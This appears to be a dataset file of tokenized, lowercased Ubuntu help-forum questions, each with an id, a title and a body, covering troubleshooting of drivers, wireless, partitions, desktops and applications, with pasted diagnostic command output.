121712	netbeans ide did work after installation , but does n't start after restart .	i installed netbeans on ubuntu 11.10 following these instructions : http : //pasindudps.blogspot.com/2011/10/installing-netbeans-ide-in-ubuntu-1110.html . it worked perfectly fine ( creating projects , open projects , compile , run ... ) but after restarting netbeans started normally and it is shown as a running application in unity-panel but i ca n't access the programm . i uninstalled and reinstalled it , it worked once but failed after restart . has anyone an idea what might be the problem here ? thanks in advance . regards
121721	no headphone sound on a 2011 imac	sound works fine from the internal speakers from my imac 2011 , but the headphone and microphone jack seem to have no output/input . any ideas on how to fix this ?
121722	how to watch high quality youtube videos in movie player ( totem ) ?	i can watch you-tube videos in movie player by using you-tube plug-in for movie player but i need to watch videos in high quality . thanks
121731	deleting unused swaps partions	good evening everyone , i got a little issue with swap partitions . due to some issues after installing ubuntu first time , i reinstalled it and now i have 3 swaps . here is sudo fdisk -l result disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xaa9693fe device boot start end blocks id system /dev/sda1 2048 52430847 26214400 1c hidden w95 fat32 ( lba ) /dev/sda2 * 52430848 540677076 244123114+ 7 hpfs/ntfs/exfat /dev/sda3 540678142 1465147391 462234625 5 extended partition 3 does not start on physical sector boundary . /dev/sda5 1452750848 1465147391 6198272 82 linux swap / solaris /dev/sda6 1440352256 1452742655 6195200 82 linux swap / solaris /dev/sda7 540678144 1427951615 443636736 83 linux /dev/sda8 1427953664 1440339967 6193152 82 linux swap / solaris so swaps in /dev/sda5 and /dev/sda6 are no longer in use as far as i understand and thus i was planning to delete them , however faced a problem . what i did is download and burn gparted live cd and boot it up , tried to delete those partitions but i have no idea how to add 12gb unallocated memory to the existing os partition in this case to /dev/sda7 is there anyway i can delete 2 swaps and extend unallocated memory to /dev/sda7 partion ? thank you in advance !
121732	can not start ubuntu-desktop	i am mainly a windows technician and am trying to install ubuntu server . everything worked fine and i can log in using the shell but when i installed ubuntu-desktop it just refuses to start ? i did try startx and i get the message `` server already running '' i tried `` start gdm '' ( what is this supposed to do ? ) and it comes back with `` job is already running : gdm '' i know that the server version is not really for ubuntu-desktop but all our other servers are like that and i want it , is there any help out there ? ps . the server is running on a vm install that my it department made for me and i connect to the machine shell using `` tera ter web 3.1 ''
121736	multiple email accounts ( hotmail , yahoo ) and facebook handled together	is there a way to open yahoo , hotmail and facebook together in an outlook style application ? like pidgin handles now all my messaging , i 'd like another application to handle all my emails from one application .
121737	how do i get hostapd to work with tp-link tl-wn727n in ap mode ?	i 'm trying to start hostapd but without success . i 'm using headless ubuntu 11.10 oneiric 3.0.0-16-server x86_64 . wlan driver is rt2800usb and my wireless nic card tp-link tl-wn727n supports ap mode as shows below : us0 # ifconfig wlan0 wlan0 link encap : ethernet hwaddr 00:27:19 : be : cd : b6 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) us0 # lsusb bus 003 device 003 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter us0 # lshw -c network *-network:3 description : wireless interface physical id : 4 bus info : usb @ 3:2 logical name : wlan0 serial : 00:27:19 : be : cd : b6 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.0.0-16-server firmware=0.29 link=no multicast=yes wireless=ieee 802.11bgn us0 # hostapd /etc/hostapd/hostapd.conf configuration file : /etc/hostapd/hostapd.conf could not read interface wlan0 # the int flags : no such device nl80211 driver initialization failed . eloop : remaining socket : sock=4 eloop_data=0xd3e4a0 user_data=0xd3ecc0 handler=0x433880 eloop : remaining socket : sock=6 eloop_data=0xd411f0 user_data= ( nil ) handler=0x43cc10 us0 # cat /etc/hostapd/hostapd.conf ssid=home interface=wlan0 # the interface name of the card # driver=rt2800usb driver=nl80211 macaddr_acl=0 ieee80211n=1 channel=1 hw_mode=g auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=88888888 wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp us0 # iw list wiphy phy0 band 1 : capabilities : 0x172 ht20/ht40 static sm power save rx greenfield rx ht20 sgi rx ht40 sgi rx stbc 1-stream max amsdu length : 7935 bytes no dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 2 usec ( 0x04 ) ht rx mcs rate indexes supported : 0-7 , 32 tx unequal modulation not supported ht tx max spatial streams : 1 ht tx mcs rate indexes supported may differ frequencies : * 2412 mhz [ 1 ] ( 20.0 dbm ) * 2417 mhz [ 2 ] ( 20.0 dbm ) * 2422 mhz [ 3 ] ( 20.0 dbm ) * 2427 mhz [ 4 ] ( 20.0 dbm ) * 2432 mhz [ 5 ] ( 20.0 dbm ) * 2437 mhz [ 6 ] ( 20.0 dbm ) * 2442 mhz [ 7 ] ( 20.0 dbm ) * 2447 mhz [ 8 ] ( 20.0 dbm ) * 2452 mhz [ 9 ] ( 20.0 dbm ) * 2457 mhz [ 10 ] ( 20.0 dbm ) * 2462 mhz [ 11 ] ( 20.0 dbm ) * 2467 mhz [ 12 ] ( 20.0 dbm ) ( passive scanning , no ibss ) * 2472 mhz [ 13 ] ( 20.0 dbm ) ( passive scanning , no ibss ) * 2484 mhz [ 14 ] ( 20.0 dbm ) ( passive scanning , no ibss ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 4 supported interface modes : * ibss * managed * ap * ap/vlan * wds * monitor * mesh point supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * unknown command ( 68 ) * unknown command ( 55 ) * unknown command ( 57 ) * unknown command ( 59 ) * unknown command ( 67 ) * set_wiphy_netns * unknown command ( 65 ) * unknown command ( 66 ) * connect * disconnect the question is : why the hostapd not starting ?
121739	how do we prevent users from changing the proxy setting ?	our school is running ubuntu 12.04 desktop . we have a server that filters/block websites via proxy . we need a way to prevent the student account ( the account type is limited ) from changing the proxy settings . we have tried to use the `` users and groups '' to change user privileges but this does not work .
121740	how to properly set up a network bridge using bridge-utils using wlan0 as the internet `` source '' ?	hey everyone this is my first post so go easy on me . i currently have a laptop with ubuntu studio 12.04 beta 2 that is supplying a wireless internet connection to a windows 7 desktop computer that 's connected directly to the laptop through ethernet . i 'm using the `` shared to other computers '' method in network manager but i believe it does n't work with what i want to do . i would like to have the windows computer on the same subnet as every other computer in my house ( 192.168.1.x ) so i can use lan applications ( midi over wifi , bonjour etc . ) on the windows computer without having to run a massive cable to the router . i 've been googling endlessly and tried multiple configurations in the /etc/network/interfaces file without success . all of them would report `` can not add wlan0 to bridge '' this is the last configuration i tried : auto lo iface lo inet loopback auto eth0 auto wlan0 auto br0 iface wlan0 inet dhcp wireless-essid 3gf2 wireless-key passw*rd wireless-mode managed iface eth0 inet manual up ip link set eth0 up iface br0 inet manual bridge_ports wlan0 eth0 is there a specific way to make this work ? what am i missing ? thank you
121742	ubuntu one synching changed files	i have several folders in the ubuntu one folder and if i add a new file ( on my pc and on my mobile ) the file shows up in the other device or in the online access . however , if i change one of the files ( like a spreadsheet i change almost daily on my pc ) ubuntu one is not updating the changed file . it is still the old file on the other devices . does n't ubuntu one sync changed files only new ones or do i have to change some settings ? could someone be so nice and help me ? thanks in advance ! mark ps : i am using ubuntu 11.10 64 bit .
121745	how do i enable my wireless switch ? hp pavilion dv4000	i found some information to run a test and discovered that my pro wireless ( intel ) has been disabled . there seems to be information on how to check things but i can not find out how to enable it or turn it on . this was all working fine until the other day and poof ... disabled but i can not find hardware or software by that name . and ... no where can i find information on how to find the switch and enable it or turn it on . so how do i enable my wireless switch on my hp pavilion dv4000
121752	keyboard layout switch custom shortcut keys	how to change keyboard layout switching shortcut keys to shift+⌘ ( apple command key ) ? i 'm using ubuntu 10.04 with mac keyboard . there is no apple command key in keyboard layout options . when i try to add shortcut shift+⌘ in keyboard shortcuts nothing happens , although shift+⌘+anykey works . also , setxkbmap us works to set specific layouts , but not to toggle between them .
121755	firefox add-ons incompatible with the current version	i loaded firefox in the beginning , used it for a bit then had issues so i removed the program . i tried to load firefox again , getting a newer version , and now in “add-ons” i get an error message that i need to install ref control , which i have ( and it shows up in “add-ons” and is enabled ) . i also get a message that xul cache 1.0 is n't compatible with firefox 8.0 . so now my question : how do i fix this problem , and where do i change or update my xul cache 1.0 to a working program ?
121756	which latest version of ubuntu is suitable for my old system ?	my system specifications are : intel celeron x86 family 6 model 13 stepping 8 genuineintel 1.5 ghz 224 mb of ram 30 gb hard disk graphics vga 64 mb 1024x768
121757	how do i change the default hyperlink color ?	i like dark background , light text layouts . however , it is still making hyperlinks dark blue , which makes them very hard to read . here 's a screenshot . the program is zim , but the color scheme is the same by most programs . is there a way to change that ? is this something that i can set in the theme ? i 'm using a theme called giungla .
121758	ubuntu 11.04 server randomly hanging	i 'm running an ubuntu 11.04 server release with kernel version 2.6.38.13-server , and for as long as i 've had the system it has hung randomly . i 'm starting to look into the lsi megaraid controller , but was wondering if anyone else experienced similar . here 's the system essentials : motherboard : supermicro h8sgl cpu : amd opteron 6172 12-core ram : 64gb ddr3-1333 ecc lsi megaraid mr9240-8i controller , with 8 sata drives attached in raid-5 with 2 hot spares - 4tb total available storage i have n't done an intensive memory check yet , so that 's still on the table . the system runs for about a month before up and choking to death for no apparent reason . kern.log sheds no light . no info from dmesg . leaving a monitor attached with screensaver turned off and kernel messages dumping out there also provides no useful information . i 've thought about upping the kernel diagnostic output , but am unsure how to achieve that without recompiling the kernel . the machine is intended to be a vm host , so you can appreciate that this is not really an acceptable level of service when running 5-15 virtuals ! i 've been using kvm as the underlying hypervisor , and it 's run perfectly fine on lower-end ( desktop-class ) machines - everything from amd x2 multicores to core2-quads . all of them are running various incarnations of ubuntu , usually 10.04 or better . the system freezes used to happen more frequently , but decreased a bit with updates and also with going from 10.04 to 11.04 . as far as the raid card is concerned , i only suspect that because it would n't be the first lsi card to give me similar/major issues ( even a `` reputable '' vendor such as lsi is not without its bad devices - i usually use mdadm anymore , just because it 's safer and runs just as good ) . unfortunately the entire system is on the raid controller , so migrating it off will be tricky but doable . the system is currently only running 5 virtuals now , and i 'll probably migrate the rest of them over to other hosts until i can get this machine straightened out , which means i can do an intensive memory scan in the meantime . but any insight or information anyone else has to offer , or instruction on enhancing the output of kernel diagnostics would be great ! i 'm also willing to hook up a serial cable to a nearby machine to capture data that way , but i 've never done it before and would appreciate a link if someone has one handy and thinks such a thing would be useful . thanks ! ! !
121765	execute file denied	i am a beginner on ubuntu 11.10 , i want to execute some program named ./pro but when i try : $ ./pro i get the following error : $ bash : ./pro : permission denied . when i try to change the permissions , by running : $ sudo chmod +x pro , nothing changes ! in fact when i do $ ls -l pro the result is : $ -rw -- -- -- - 1 hafez hafez 7251 2012-03-19 07:44 pro how can i run my file ?
121773	ultraedit linux , why cant i modify a file ?	sorry for the rookie question , i just installed ultraedit for ubuntu and i can open files and modify them but when i try to save them i dont have permissions ? using the command line and vim i can sudo and make all the changes i want but i am not sure how to get admin privileges using a gui . i have searched for 20 mins and i have been unable to find anything , can anyone point me in the right direction ? thanks
121778	how to hide/remove `` exit , minimize , maximize '' bar on top of the application when not maximized , showing only the application/program on the desktop	i 'm an on and off novice ubuntu user , last used 9.04 and installed 11.10 a week ago . what i want to happen , edit unity to suit how i use my computer : copy the way xmonad ( www.xmonad.org ) shows its applications and that is that there is no `` exit , minimize , maximize '' bar on top of the application i 've read a few things on how to configure unity using ubuntu tweak and myunity i want to eventually switch to xmonad but for now it is still too complicated for me even with all the docs & tutorialss it 's still too complicated for me & i can not yet let go of my mouse tl ; dr ? from this : to this is this possible ? and if it is possible , how ?
121780	how can i install spark instant messenger client 2.6.3 ?	i downloaded spark_2_6_3.tar.gz from http : //www.igniterealtime.org/downloads/index.jsp . after extracting the file and cding into spark , i ran both ./starter and ./spark but the messenger client is not running . i am using ubuntu 11.10 , 64 bit .
121782	blank desktop after updates today , only unity2d works now	i have been using 12.04 ( wubi ) since a week now and this is my 1st exposure to linux . everything was going on fine till now , but today as soon as i updated through the update manager , docky gave a message that compositing is required or something , and i got an error window which asked me to report the error and then the update manager asked me to reboot . after rebooting , i just get a blank desktop screen , no launcher , no toolbar . i have to restart with the power key . however if i login through unity 2d everything is fine except the benefits of the 3d environment . i guess something got messed up after the update and i cant figure out which program or file caused this mess . i would highly appreciate if someone could help me out with this as i really liked working on ubuntu after windows 7 . thanks ! solved -- thanks @ jrg for the link provided.. it helped me to come out of this mess . actually some update of compizconfig made the unity plugin inactive did something to the animation add ons , the one which you use for the burn effect etc . what i did was : on the blank desktop pressed keys ctrl + alt + t to bring up the terminal and typed ccsm this brought up the compiz config system manager , there i enabled the unity plugin and rebooted . everything started working fine . but then again when i started the addons plugin , everything went back to square one.. : ( . this time pressing ctrl + alt + t also did not help . then i tried ctrl + alt + f1 , it brought up a terminal or whatever u call it , and then i typed unity -- reset , it did some resetting and in the end it showed some comositing done , i pressed ctrl + alt + f7 to come back to the desktop , and here it was , my old sweet desktop.. it had the animation effects too like wobbly windows , excepting the addons like the burn effect , i guess something got wrong with the last update of that addon plugin and now whenever i try turning that on , everything goes poof ! ! 6 hours wasted , but i guess i learnt something new.. not bad for an orthodontist i guess : ) )
121784	ubuntu 11.10 very slow compared to windows	i 'm new to ubuntu/linux . since my pc is very old and not very fast with windows 7 , i decided to give ubuntu a try , so i downloaded and installed ubuntu 11.10 today . when i first started it , i had bad 800x600 resolution and it was very slow and annoying . so i installed a driver for my graphic card and now everything looks very nice ( 1280x1024 ) .but i think it 's still far slower than windows 7 . i tried to run in ubuntu like a few people suggested on the forum but if i log in i get a black screen saying something like `` this video mode can not be displayed '' . i get that same screen when booting ubuntu btw , but after about 15 seconds it disappears and just starts ubuntu . i also installed other drivers for my graphic card but everything stayed the same . i noticed that i.e . when i open firefox or system settings it takes about 5 seconds till it opens ( while windows 7 takes under 1 second to start i.e . chrome ) and when i do this my cpu usage gets to 100 % for a short time . computer specs : memory : 2gb ram processor : intel pentium 4 2.8ghz graphics card : nvidia geforce 6800 400mhz . i read on various forums that 11.04 works flawless on many pcs , where 11.10 is very slow . should i install 11.04 or could anybody help me with this problem ?
121788	manually force brasero to burn an iso on a defined image speed	i need to burn an iso on 2x , but brasero only let me burn it on 4x . is there any way or any app who will let me burn on 2x ?
121796	how tell thunderbird to open links in a certain firefox instance ?	i 'm using firefox and thunderbird profiles for different activities and have them running as separated instances ( processes ) on different virtual desktops . this works great in general . but a big issue is that i ca n't directly open links from mails . i just get the message `` firefox is already running , but is not responding ... '' is there a way to configure the url handler such that it will open the site in a firefox instance with a certain profile ? i already tried to set the preference network.protocol-handler.app.http to /usr/bin/firefox -p myprofile , but that did n't change anything .
121797	how do i install ccmake ?	how do i install ccmake ( not cmake ) ? i have tried the following to no avail : sudo apt-get install ccmake
121798	dual monitor wrong screen focus during drag-and-drop	i have a dual monitor set-up which is helpful when designing or programming . usually i 'll have both screens used with full size windows . my left monitor i guess would be the main monitor since it has the 3-d unity launcher . i 'd say 90 percent of the time i use the right monitor for workspace and the left monitor for tool-space or as a file/folder browser . if i try to grab the screen on the left to drag it to the right , the screen on the right actually gets the `` focus '' and i end up dragging it around . this is n't a major issue , but it would be nice to have a fix . i 've tried using gconf-settings to adjust the sensitivity , but have n't had much success . any tips ?
121806	problem loading internet pages	i have installed ubuntu 11.10 and when on firefox i can get onto google or google earth and even gmail.but it wont connect to amazon or ebay or bbc or itv homepage.it only seems to like google i have ethernet connection.i also cant download from download centre yet downloaded google chrome no probs . weird
121807	error when i compile kernel 3.3.2 in ubuntu 12.04	i thinks is not a bug of ubuntu . this is the output : objcopy arch/x86/boot/vmlinux.bin hostcc arch/x86/boot/tools/build build arch/x86/boot/bzimage setup is 16800 bytes ( padded to 16896 bytes ) . system is 4599 kb crc f77d64c0 kernel : arch/x86/boot/bzimage is ready ( # 1 ) building modules , stage 2 . modpost 3268 modules error : `` __modver_version_show '' [ drivers/staging/rts5139/rts5139.ko ] undefined ! warning : modpost : found 4 section mismatch ( es ) . to see full details build your kernel with : 'make config_debug_section_mismatch=y' make [ 1 ] : *** [ __modpost ] error 1 make : *** [ modules ] error 2
121810	what does libgs10-dev relate to ?	as part of an installation process i am instructed to install libgs10-dev , however i can not find any reference to this package outside of this installation guide ( `` hacking the kinect '' , apress , 2012 ) . firstly , what is this package ? secondly , how can i install this package ( apt-get install does not seem to find it ) ?
121815	how can i add more space for indicators ?	i am running 12.04 lts and have used my unity to set the launcher as needed , and even added classic menu indicator to the top bar to the far right , next to the default icons . i found classic menu indicator here : http : //www.florian-diesch.de/software/classicmenu-indicator/ my question is , with that very same small amount of icon space available at the top right , how do i add more items ? i understand the rest of the top bar from middle to far left is used by the active app . is there a way to tweak the space it takes to open more room for custom items ? i use these systems as hardcore work machines to every centimeter of user space is worth pursuing .
121818	how do i set nautilus to use same window on double click ?	how do i set nautilus to use same window on double click when browsing folders ? this would be similar to how windows works . right now , my nautilus opens a new window of nautilus if i double click a folder . to use the same window i have to remember to nicely click the little arrow icon to expand the folder . so , is the default behavior changeable ?
121821	why and how to install chrome user agent	why do i need a specific `` user agent '' to access some websites . i have received instances `` you need internet explored 6.0 or better to access this web site '' why should i install a `` user agent '' extension in chrome . is there a workaround ? if i install the extension will it devoid my browser 's security .
121827	how do i install ucontrol	how do i install ucontrol from http : //www.negusoft.com/index.php/ucontrol-downloads it comes in a tar.gz . i unpacked it and tried fallowing the readme but am getting nowhere . what are the steps to take ? i am trying to set up my ipod with my computer so i can have a track pad over bluetooth .
121840	geforce8800 ultra	i have been running ubuntu 10.04 with geforce 8800 ultra graphics card without any problems for many months until a few days ago , after some updates , everything stopped working . ca n't use stellarium ( my favorite program ) and everything ( even the mousecusor ) stops responding for a long time . takes ages to load the desktop and everything is just `` f ... '' b.t.w . i have a dual boot and winxp is not having this problem with the 8800 card . so , elementary ... what 's going on between ubuntu and nvidia ? best regards gunnar
121853	how do i synchronise bookmarks from firefox with ubuntu one automatically ?	i do n't know if this is possible and already done automatically when logging in with ubuntu one , but can i synchronise bookmarks from firefox to ubuntu one automatically ? so that i can add bookmarks on the same computer from ubuntu 11.10 to 12.10 or even from a newer installation of ubuntu . if it is possible , how can i do that ?
121855	tty characters mixed up after device cat or python print	so , when i cat /dev/input/mouse0 in a tty , move the mouse around a bit , and then ctrl-z to stop cat , my terminal characters are all messed up . almost every single character gets swapped out for another character in the ascii character set . this same situation occurs when i execute this in python 3.2 : print ( '\033 [ 1 ; 12mtest.\033 [ 1 ; m ' ) the the same symptom does not appear on a shell in the gui , only on the virtual terminals . the problem does not go away if i log out . i suspect that a certain escape code ( which may be contained within the python code ) is remapping the ascii byte codes to the character representations , but that is just a guess . what is happening and how do i undo it ?
121856	dual vga cards intel/ nvidia	this is my first post in this forum.. i am new to linux , just installed ubuntu 11.10 on my sony vaio vgn-z12 with two graphic cards intel and nvidia geforce 9300 gs . after the installation the lightdm works on intel card but with very law display quality . i installed nvidia driver from the official website as well as this ppa . sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current once i install the driver and run nvidia-xconfig which creates xorg.conf file the xserver will not start with error `` no screen '' if i delete the xorg.conf file then i am able to start the xserver normally but with intel display ( bad quality ) please help
121858	how to change the badges for the xsessions in lightdm ?	in lightdm , the sessions now display a `` badge '' with a logo for the xsessions , but badges available are limited to kde , gnome , unity , and recovery console . any other session displayed will use the `` unknown_badge.png '' file ( which is only a blank plain circle ) , as found on `` /usr/share/unity-greeter '' . however , i want to get new badges to work on other common sessions , like xbmc standalone , xfce4 , and razor-qt mostly , ( also this would be ideal for lxde , e17 , openbox and other de users ) . i made my own example badge for xbmc , saved the file on `` /usr/share/unity-greeter '' . still though , i can not figure out how to make lightdm or the unity-greeter to select that badge to the specific xsession file . any help ?
121864	django environment variable undefined	on running django , i frequently get the following error : importerror : settings can not be imported , because environment variable django_settings_module is undefined . how do i set the evironment variables correctly ? i tried the solution here but did not did not have any success .
121865	how to recover an interrupted 12.04 upgrade from 11.10 ?	ok , i will get right to the point . i was upgrading ubuntu to 12.04 from 11.10 ( x64 ) and right in the middle of the package installation i had a freeze ( not ubuntu 's fault ) forcing me to do a hard reset of my pc . now the ubuntu installation is completely broken i can only get access via recovery mode . i already tried `` apt-get update & & apt-get upgrade '' and the option to fix broken packages . nothing changed . so i 'm wondering if its possible to fix the broken packages , or maybe to restore before the upgrade ? thank you in advance .
121866	why does bash remove \n in $ ( cat file ) ?	if i have the file input.txt containing : hello world ! then executing the bash command echo $ ( cat input.txt ) will output this : hello world ! why and how can i fix it to output exactly what is in the file how it is in the file ?
121869	how do i print in mirror image	i want to print some iron-ons ( like for t-shirts ) which requires printing the document in reverse ( aka mirror image ) . does anyone know a way to do this in ubuntu 11.10 ? as far as i know , my printer does not have the function built in .
121870	problem with samba + netbios . ca n't ping ubuntu from windows	i can not ping my ubuntu box from windows . i have samba installed and i have checked iptables and netbios ports are not blocked . smbd and nmbd are both running . i 'm running ubuntu 11.10 server . i was able to set this up fine and getting working on my ubuntu 11.10 desktop . i 've looked at several other posts , but none of them fix my problem . any ideas ?
121871	package power limit notification ?	i started receiving this error recently when i hibernate my ubuntu 11.10 : cpu 4 : package power limit motications ( total events : 988 ) etc for all my 8 cpus/threads . my configuration is such with i5/8gb ram . what does this error mean ? overheating ?
121875	erasing vista on gateway laptop	i have a gateway m305 crv and it was running windows xp and my sister upgraded it to vista and for a while now its been saying that vista is n't valid and the laptop only runs with minimal access . i can not get to any of my files and i downloaded ubuntu to my external hard drive and tried to install it but i keep getting the error that the drives are not ready and i have to do this in safe mode .
121877	microphone not working in skype unless i switch off autospawn in pulseaudio	i have a clean install of precise with gnome fall-back desktop on an acer aspire lappie . the mic wo n't work on skype unless i switch off 'autospawn ' in pulseaudio . that solution kills all audio controls for the system ( but the mic works in skype ) . would be nice to simply fix the mic in skype and not mess up the gui controls for the system . does anybody have a solution for this ?
121878	what is the best hdr software ?	how can i go about hdri software for ubuntu 12.04 beta2 ? your help would be highly . appreciated
121881	my logon and logout taking too much time ! is there a way to make them fast ?	i regularly use bleachbit to clean my system . though login and logout now taking lots of time.is there a way to make at least login faster ? i have done some kernel updates . i have three different version of kernels now . does this causing the slow startup ? ? i every time select a kernel , then a red screen appears for almost 14 sec then comes up the ubuntu screen . and lastly login screen . i want to just go into the login screen after selecting kernel . is there a way to do something like that ? how can i make system start faster ?
121884	does running nexuiz gives extra pressure on processor if you dont have external graphics card ?	its a rather stupid question , though i want to be sure . does having a external graphics card can lower the stress over the processor ? what kind of graphics card ubuntu supports ? well i 'm planning to buy a graphics card for windows 7 as i have started learning adobe premiere pro . which g card should i buy ? do i consider the card or the availability of the card drivers for ubuntu linux ? if i install a graphics card and does not install its drivers can i left it unused on ubuntu ? i do n't think theres a much need for g card on ubuntu though .
121886	how to create a windows like restore point using deja dup ?	when i click on deja-dup storage , i can see there are some ubuntu folders , ubuntu one , webdav and all the windows drive visible . if i select a windows drive for my backup is it going to backup all files including my installed softwares , muzic , movies- everything ? ! when i open/closes a windows drive it mounts and unmounts . if i select that option does it going to cause any mount/unmount problem ? what is webdav ?
121889	wireless does n't work for me in lubuntu but does in puppy ?	i am new to gnu linux . i have been having trouble getting wireless working on my installed system of lubuntu 11.10 . it sees my wpa network but can not connect even when i remove the password . looking around for a different distro that might replace it , i was amazed to find that puppy was able to connect to my wireless network without trouble , running off a usb stick . so this makes me think that my lubuntu wireless problem might be fixable so i do n't have to have the major hassle of backing up all my documents etc before installing a different distro to the laptop . can anyone suggest some steps that might help me to fix wireless on lubuntu , perhaps using the fact it works with puppy ? thanks . rob edit : ( thank you both for the advice and link on making the question more useful . hope this is better ... ) ( ps . wep does n't work either ; rebooting does n't help ) here is the output for lubuntu ( wireless network on ; wired ethernet connection to laptop unplugged ) : > lspci -nn ... 10:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 02 ) > ifconfig eth0 link encap : ethernet hwaddr 00:1c : c4 : c9:80:75 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:22 memory : e4600000-e4620000 eth2 link encap : ethernet hwaddr 00:1a:73 : e6 : b6:16 inet6 addr : fe80 : :21a:73ff : fee6 : b616/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:400 errors:0 dropped:0 overruns:0 frame:0 tx packets:400 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:31840 ( 31.8 kb ) tx bytes:31840 ( 31.8 kb ) btw , on puppy , ifconfig gives : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:120 errors:0 dropped:0 overruns:0 frame:0 tx packets:120 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9104 ( 8.8 kib ) tx bytes:9104 ( 8.8 kib ) wlan0 link encap : ethernet hwaddr 00:1a:73 : e6 : b6:16 inet addr:192.168.0.100 bcast:192.168.0.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:17375 errors:0 dropped:0 overruns:0 frame:0 tx packets:16352 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:17577062 ( 16.7 mib ) tx bytes:3587630 ( 3.4 mib ) ( back to lubuntu : ) > sudo lshw -class network [ sudo ] password : *-network description : ethernet interface product : 82562gt 10/100 network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 03 serial : 00:1c : c4 : c9:80:75 capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.3.10-k2 firmware=1.1-2 latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : e4600000-e461ffff memory : e4620000-e4620fff ioport:4020 ( size=32 ) *-network description : wireless interface product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : eth2 version : 02 serial : 00:1a:73 : e6 : b6:16 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:17 memory : e4000000-e4003fff > rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no the output from dmesg dmesg | grep -i firmware cat /var/log/udev cat /var/log/dmesg cat /var/log/xorg.0 ls -lrt /var/log is here if required ! ( pardon my ignorance ) further ( more than a month later ) : well , finally i tried the suggestions on that page suggested by fossfreedom , and pages linked therein ( did things one at a time with reboots where suggested ) : did the suggested uninstalls ( bcmwl-kernel-source package ) , did the installs ( firmware-b43-installer and b43-fwcutter packages ) , commented out the blacklist ( in /etc/modprobe.d/blacklist.conf ) etc , etc , and variations suggested . wireless still does n't work . out of interest , here 's what i get with the following . is the `` access denied '' significant/suggestive ? does anyone kind , lucid and patient , have any other ideas ? > lspci -vnn -d 14e4 : 10:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 02 ) subsystem : hewlett-packard company bcm4311 802.11b/g wireless lan controller [ 103c:1375 ] flags : bus master , fast devsel , latency 0 , irq 17 memory at e4000000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : wl kernel modules : ssb also , modprobe -r wl fatal : module wl not found . another point : in additional drivers , the proprietary driver is still shown but is not active . could n't see how to remove it ( only inactivate it ) . neither worked ( active or inactive ) . my pc-id of [ 14e4:4311 ] is supported according to this page : http : //wireless.kernel.org/en/users/drivers/b43 i do n't grok at all what 's going on . not even the basics . did at one point but am so befuddled now that i need a holiday . it 's clear this distro was a bad choice for my level of non-expertise ( will inform the friend who suggested it but uses something else ; feel like a guinea pig ) .
121892	gparted does n't see any partition	what i am trying to do could n't be more logical i think . i have a 40gb drive with two partitions , xp and ubuntu . i have dual boot , everything boots and works perfectly . i have about 9gb free in the windows partition when i run gparted i only see 40gb unallocated space , booting from gparted live cd . what the hell is going on ? i 've read everywhere this is a common problem , however it has no sense something like this remains unsolved by gparted developers , considering what i am trying to do is the very basic step anybody wanting to migrate from windows to linux would od something like this honestly does n't give anything else than frustration could anybody on this forum be so kind to explain whats ' going on ? thanks
121893	syncing ipod through banshee	i tried `` importing to library '' then all the music is in my library , but when i disconnect the ipod the music is n't playable .
